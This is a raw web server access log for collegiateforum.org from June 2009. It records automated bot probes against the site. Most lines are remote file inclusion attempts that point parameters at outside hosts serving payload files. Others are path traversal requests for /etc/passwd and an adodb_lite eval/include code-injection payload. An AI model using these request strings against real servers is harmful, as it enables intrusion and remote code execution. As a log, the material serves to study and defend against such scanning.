218.232.105.116 - - [29/Jun/2009:04:44:32 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
218.232.105.116 - - [29/Jun/2009:04:44:33 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:04:44:40 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:04:44:40 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:04:44:40 -0700] "GET /logs/access.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:04:45:11 -0700] "GET /logs/access.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:04:45:11 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:04:45:11 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:04:45:11 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:04:45:11 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:04:45:11 -0700] "GET /logs/access.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
122.153.28.140 - - [29/Jun/2009:04:45:23 -0700] "GET /logs/access_090330.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
122.153.28.140 - - [29/Jun/2009:04:45:27 -0700] "GET /logs/access_090330.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.knt.hs.kr///id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
218.232.105.116 - - [29/Jun/2009:04:46:09 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
218.232.105.116 - - [29/Jun/2009:04:46:09 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
218.232.105.116 - - [29/Jun/2009:04:46:09 -0700] "GET /logs/access_090330.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
218.232.105.116 - - [29/Jun/2009:04:46:27 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
218.232.105.116 - - [29/Jun/2009:04:46:34 -0700] "GET /logs/access_090330.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
218.232.105.116 - - [29/Jun/2009:04:46:34 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
211.203.180.144 - - [29/Jun/2009:04:46:44 -0700] "GET /logs/access.log//phphtml.php//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
211.203.180.144 - - [29/Jun/2009:04:46:44 -0700] "GET /phphtml.php//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
211.203.180.144 - - [29/Jun/2009:04:46:45 -0700] "GET /logs//phphtml.php//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:04:46:51 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:04:46:51 -0700] "GET /phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:04:46:51 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
211.203.180.144 - - [29/Jun/2009:04:47:04 -0700] "GET /phphtml.php//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
211.203.180.144 - - [29/Jun/2009:04:47:04 -0700] "GET /logs//phphtml.php//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
211.203.180.144 - - [29/Jun/2009:04:47:04 -0700] "GET /logs/access.log//phphtml.php//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:04:47:43 -0700] "GET /phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:04:47:43 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:04:47:43 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
77.221.130.22 - - [29/Jun/2009:04:48:50 -0700] "GET /logs//logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mirc.ucoz.kz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
77.221.130.22 - - [29/Jun/2009:04:48:50 -0700] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mirc.ucoz.kz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
60.251.217.4 - - [29/Jun/2009:04:49:45 -0700] "GET /modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/test.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.collegiateforum.org"
77.221.130.22 - - [29/Jun/2009:04:50:54 -0700] "GET /logs/access.log//logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mirc.ucoz.kz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
77.221.130.22 - - [29/Jun/2009:04:52:24 -0700] "GET /logs/access.log%20//logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mirc.ucoz.kz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
209.68.2.99 - - [29/Jun/2009:04:52:43 -0700] "GET /logs/access.log//logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
209.68.2.99 - - [29/Jun/2009:04:52:43 -0700] "GET /logs//logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
209.68.2.99 - - [29/Jun/2009:04:52:43 -0700] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
122.153.28.140 - - [29/Jun/2009:04:54:00 -0700] "GET /logs/access_081208.log%20%20/index.php?redir=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
122.153.28.140 - - [29/Jun/2009:04:54:00 -0700] "GET /logs/index.php?redir=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
122.153.28.140 - - [29/Jun/2009:04:54:00 -0700] "GET /index.php?redir=http://www.knt.hs.kr///id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
122.153.28.140 - - [29/Jun/2009:04:54:02 -0700] "GET /logs/access_081208.log%20%20/index.php?redir=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
122.153.28.140 - - [29/Jun/2009:04:54:02 -0700] "GET /index.php?redir=http://www.knt.hs.kr///id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
122.153.28.140 - - [29/Jun/2009:04:54:02 -0700] "GET /logs/index.php?redir=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
122.153.28.140 - - [29/Jun/2009:04:54:02 -0700] "GET /logs/index.php?redir=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
122.153.28.140 - - [29/Jun/2009:04:54:05 -0700] "GET /logs/access.log%20%20/index.php?redir=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
122.153.28.140 - - [29/Jun/2009:04:54:05 -0700] "GET /logs/index.php?redir=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
122.153.28.140 - - [29/Jun/2009:04:54:05 -0700] "GET /index.php?redir=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
122.153.28.140 - - [29/Jun/2009:04:54:07 -0700] "GET /logs/access.log%20%20/index.php?redir=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
122.153.28.140 - - [29/Jun/2009:04:54:07 -0700] "GET /index.php?redir=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
209.68.2.99 - - [29/Jun/2009:04:54:38 -0700] "GET /logs/access.log%20//logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
83.149.102.130 - - [29/Jun/2009:04:56:28 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 200 5090 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.149.102.130 - - [29/Jun/2009:04:56:28 -0700] "GET /logs/access_090330.log//?path%5Bdocroot%5D=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:04:57:15 -0700] "GET /logs/access.log/facileforms.frame.php?ff_compath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:04:57:15 -0700] "GET /logs/facileforms.frame.php?ff_compath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:04:57:15 -0700] "GET /facileforms.frame.php?ff_compath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:04:57:22 -0700] "GET /facileforms.frame.php?ff_compath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:04:57:22 -0700] "GET /logs/facileforms.frame.php?ff_compath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:04:57:22 -0700] "GET /logs/access.log/facileforms.frame.php?ff_compath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "collegiateforum.org"
77.221.130.22 - - [29/Jun/2009:04:58:04 -0700] "GET /facileforms.frame.php?ff_compath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
77.221.130.22 - - [29/Jun/2009:04:58:04 -0700] "GET /logs/facileforms.frame.php?ff_compath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
77.221.130.22 - - [29/Jun/2009:04:58:04 -0700] "GET /logs/access.log/facileforms.frame.php?ff_compath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
77.221.130.22 - - [29/Jun/2009:04:58:10 -0700] "GET /logs/access.log/facileforms.frame.php?ff_compath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
77.221.130.22 - - [29/Jun/2009:04:58:10 -0700] "GET /facileforms.frame.php?ff_compath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
77.221.130.22 - - [29/Jun/2009:04:58:11 -0700] "GET /logs/facileforms.frame.php?ff_compath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
122.153.28.140 - - [29/Jun/2009:04:58:33 -0700] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
122.153.28.140 - - [29/Jun/2009:04:58:34 -0700] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
122.153.28.140 - - [29/Jun/2009:04:58:34 -0700] "GET /logs/access.log%20%20/bbs//skin/zero_vote/ask_password.php?dir=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
122.153.28.140 - - [29/Jun/2009:04:58:34 -0700] "GET /logs/bbs//skin/zero_vote/ask_password.php?dir=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
122.153.28.140 - - [29/Jun/2009:04:58:38 -0700] "GET /logs/bbs//skin/zero_vote/ask_password.php?dir=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
122.153.28.140 - - [29/Jun/2009:04:58:38 -0700] "GET /logs/access.log%20%20/bbs//skin/zero_vote/ask_password.php?dir=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
77.221.130.22 - - [29/Jun/2009:04:59:41 -0700] "GET /logs/access.log/facileforms.frame.php?ff_compath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
77.221.130.22 - - [29/Jun/2009:04:59:41 -0700] "GET /facileforms.frame.php?ff_compath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
77.221.130.22 - - [29/Jun/2009:04:59:41 -0700] "GET /logs/facileforms.frame.php?ff_compath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
77.221.130.22 - - [29/Jun/2009:04:59:45 -0700] "GET /facileforms.frame.php?ff_compath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
77.221.130.22 - - [29/Jun/2009:04:59:45 -0700] "GET /logs/facileforms.frame.php?ff_compath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
77.221.130.22 - - [29/Jun/2009:04:59:45 -0700] "GET /logs/access.log/facileforms.frame.php?ff_compath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
174.133.150.130 - - [29/Jun/2009:04:59:47 -0700] "GET /logs/access.log/database.php?mosConfig_absolute_path=http://www.burgmanspain.org/bots/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "collegiateforum.org"
174.133.150.130 - - [29/Jun/2009:04:59:48 -0700] "GET /database.php?mosConfig_absolute_path=http://www.burgmanspain.org/bots/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "collegiateforum.org"
174.133.150.130 - - [29/Jun/2009:04:59:48 -0700] "GET /logs/database.php?mosConfig_absolute_path=http://www.burgmanspain.org/bots/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "collegiateforum.org"
174.133.150.130 - - [29/Jun/2009:04:59:49 -0700] "GET /logs/access.log/database.php?mosConfig_absolute_path=http://www.burgmanspain.org/bots/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "collegiateforum.org"
174.133.150.130 - - [29/Jun/2009:04:59:49 -0700] "GET /database.php?mosConfig_absolute_path=http://www.burgmanspain.org/bots/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "collegiateforum.org"
174.133.150.130 - - [29/Jun/2009:04:59:49 -0700] "GET /logs/database.php?mosConfig_absolute_path=http://www.burgmanspain.org/bots/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "collegiateforum.org"
174.133.150.130 - - [29/Jun/2009:04:59:58 -0700] "GET /logs/access_081208.log/database.php?mosConfig_absolute_path=http://www.burgmanspain.org/bots/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.collegiateforum.org"
174.133.150.130 - - [29/Jun/2009:04:59:58 -0700] "GET /database.php?mosConfig_absolute_path=http://www.burgmanspain.org/bots/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:05:00:04 -0700] "GET /logs/access.log/facileforms.frame.php?ff_compath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:05:00:04 -0700] "GET /facileforms.frame.php?ff_compath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:05:00:04 -0700] "GET /logs/facileforms.frame.php?ff_compath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.collegiateforum.org"
66.96.240.245 - - [29/Jun/2009:05:00:12 -0700] "GET /logs//?sourcedir=http://styrovit.ru/includes/idxx.txt?? HTTP/1.1" 200 5090 "-" "Mozilla/5.0" "www.collegiateforum.org"
66.96.240.245 - - [29/Jun/2009:05:00:12 -0700] "GET /logs/access_090330.log//?sourcedir=http://styrovit.ru/includes/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
66.96.240.245 - - [29/Jun/2009:05:00:12 -0700] "GET /?sourcedir=http://styrovit.ru/includes/idxx.txt?? HTTP/1.1" 200 934 "-" "Mozilla/5.0" "www.collegiateforum.org"
174.133.150.130 - - [29/Jun/2009:05:00:16 -0700] "GET /logs/database.php?mosConfig_absolute_path=http://www.burgmanspain.org/bots/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:05:00:18 -0700] "GET /logs/access.log/facileforms.frame.php?ff_compath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:05:00:18 -0700] "GET /facileforms.frame.php?ff_compath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:05:00:18 -0700] "GET /logs/facileforms.frame.php?ff_compath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.collegiateforum.org"
174.133.150.130 - - [29/Jun/2009:05:00:19 -0700] "GET /logs/access_081208.log/database.php?mosConfig_absolute_path=http://www.burgmanspain.org/bots/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.collegiateforum.org"
174.133.150.130 - - [29/Jun/2009:05:00:19 -0700] "GET /database.php?mosConfig_absolute_path=http://www.burgmanspain.org/bots/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.collegiateforum.org"
66.96.240.245 - - [29/Jun/2009:05:00:24 -0700] "GET /logs/access_090330.log//?sourcedir=http://styrovit.ru/includes/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
66.96.240.245 - - [29/Jun/2009:05:00:24 -0700] "GET /?sourcedir=http://styrovit.ru/includes/idxx.txt?? HTTP/1.1" 200 934 "-" "Mozilla/5.0" "www.collegiateforum.org"
66.96.240.245 - - [29/Jun/2009:05:00:24 -0700] "GET /logs//?sourcedir=http://styrovit.ru/includes/idxx.txt?? HTTP/1.1" 200 5090 "-" "Mozilla/5.0" "www.collegiateforum.org"
174.133.150.130 - - [29/Jun/2009:05:00:25 -0700] "GET /logs/database.php?mosConfig_absolute_path=http://www.burgmanspain.org/bots/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.collegiateforum.org"
125.131.116.12 - - [29/Jun/2009:05:02:30 -0700] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.ymed.co.kr//upload/index1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
125.131.116.12 - - [29/Jun/2009:05:02:30 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.ymed.co.kr//upload/index1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
174.133.150.130 - - [29/Jun/2009:05:02:51 -0700] "GET /logs/access.log/database.php?mosConfig_absolute_path=http://www.burgmanspain.org/bots/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "collegiateforum.org"
174.133.150.130 - - [29/Jun/2009:05:02:51 -0700] "GET /database.php?mosConfig_absolute_path=http://www.burgmanspain.org/bots/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "collegiateforum.org"
174.133.150.130 - - [29/Jun/2009:05:02:51 -0700] "GET /logs/database.php?mosConfig_absolute_path=http://www.burgmanspain.org/bots/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "collegiateforum.org"
174.133.150.130 - - [29/Jun/2009:05:03:00 -0700] "GET /logs/access_081208.log/database.php?mosConfig_absolute_path=http://www.burgmanspain.org/bots/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.collegiateforum.org"
174.133.150.130 - - [29/Jun/2009:05:03:00 -0700] "GET /database.php?mosConfig_absolute_path=http://www.burgmanspain.org/bots/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.collegiateforum.org"
174.133.150.130 - - [29/Jun/2009:05:03:00 -0700] "GET /logs/database.php?mosConfig_absolute_path=http://www.burgmanspain.org/bots/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.collegiateforum.org"
122.153.28.140 - - [29/Jun/2009:05:04:33 -0700] "GET /logs/access.log/bbs//skin/zero_vote/ask_password.php?dir=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
125.131.116.12 - - [29/Jun/2009:05:04:37 -0700] "GET /logs/access_081208.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.ymed.co.kr//upload/index1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
122.153.28.140 - - [29/Jun/2009:05:04:44 -0700] "GET /logs/access.log/bbs//skin/zero_vote/ask_password.php?dir=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
125.131.116.12 - - [29/Jun/2009:05:06:08 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.ymed.co.kr//upload/index1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
125.131.116.12 - - [29/Jun/2009:05:06:08 -0700] "GET /logs/access.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.ymed.co.kr//upload/index1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
125.131.116.12 - - [29/Jun/2009:05:06:09 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.ymed.co.kr//upload/index1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
66.155.118.125 - - [29/Jun/2009:05:13:33 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "collegiateforum.org"
80.247.76.181 - - [29/Jun/2009:05:14:18 -0700] "GET /?sourcedir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 200 934 "-" "libwww-perl/5.805" "www.collegiateforum.org"
80.247.76.181 - - [29/Jun/2009:05:14:18 -0700] "GET /logs/?sourcedir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 200 5085 "-" "libwww-perl/5.805" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:05:14:49 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:05:14:49 -0700] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:05:14:57 -0700] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
